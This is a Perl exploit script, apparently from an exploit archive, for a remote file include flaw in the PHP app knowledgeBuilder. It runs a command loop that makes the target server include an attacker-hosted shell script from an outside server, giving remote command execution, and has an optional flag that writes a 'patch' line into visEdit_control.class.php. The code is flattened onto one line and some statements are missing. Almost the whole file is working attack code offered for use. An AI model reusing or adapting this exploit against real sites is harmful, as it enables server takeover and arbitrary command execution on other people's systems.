#!/usr/bin/perl # # knowledgeBuilder v.2.2.php.NuLL-WDYL=> Remote File Include Vulnerability # Script.............. :knowledgebuilder php.NuLL WDYL # Discovered By.... : IGI # Expl0iter ........ : Root3r_H3LL # Location .......... : Iran # Class.............. : Remote # Original Advisory :http://www.Virangar.org & http://Www.PersainFox.com # ; while ($cmd !~ "exit") { $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request->new(GET=>$target.$file.$shellsite.'?&'.$shellcmd.'='.$cmd) or die("\n\n Failed to connect."); $res = $xpl->request($req); $r = $res->content; $r =~ tr/[\n]/[ê]/; if (@ARGV[4] eq "-r") { print $r; } elsif (@ARGV[5] eq "-p") { # if not working change cmd variable to null and apply patch manually. $cmd = "echo if(basename(__FILE__) == basename(\$_SERVER['PHP_SELF'])) die(); >> visEdit_control.class.php"; print q { !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !! Patch Applied !! !! Code added to visEdit_control.class.php: !! !! if(basename(__FILE__) == basename($_SERVER['PHP_SELF'])) !! !! die(); !! !! !! !! NOTE: Adding patch function has not been tested. If does not complie or !! !! there is an error, simply make cmd = null and add the patch code to !! !! visEdit_control.class.php !! !! !! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! } } else { print "[cmd]\$"; $cmd = ; } } sub header() { print q { ................................................................ .. .. .. knowledgebuilder <= Remote File Include Exploit .. .. .. ................................................................ .. Virangar Under Ground TeaM .. .. AND .. .. PerSiaNFox NetWork Security TeaM .. .. Discovered By : IGI .. .. ExPl0iter : Root3r_H3LL .. ................................................................ .. Www.Virangar.OrG .. .. Www.PerSiaNFox.coM .. .. Www.Virangar.NeT .. ................................................................ <-r> <-p> - Path to target eg: www.SiteName.com - Path to shell eg: www.Sh3llserver.com/sh3ll.txt - Shell command variable name eg: cmd - Show output from shell

- Patch visEdit_control.class.php Example perl Expl0it.pl http://SiteName http://Sh3llserver/sh3ll.txt cmd -r -p }; exit(); }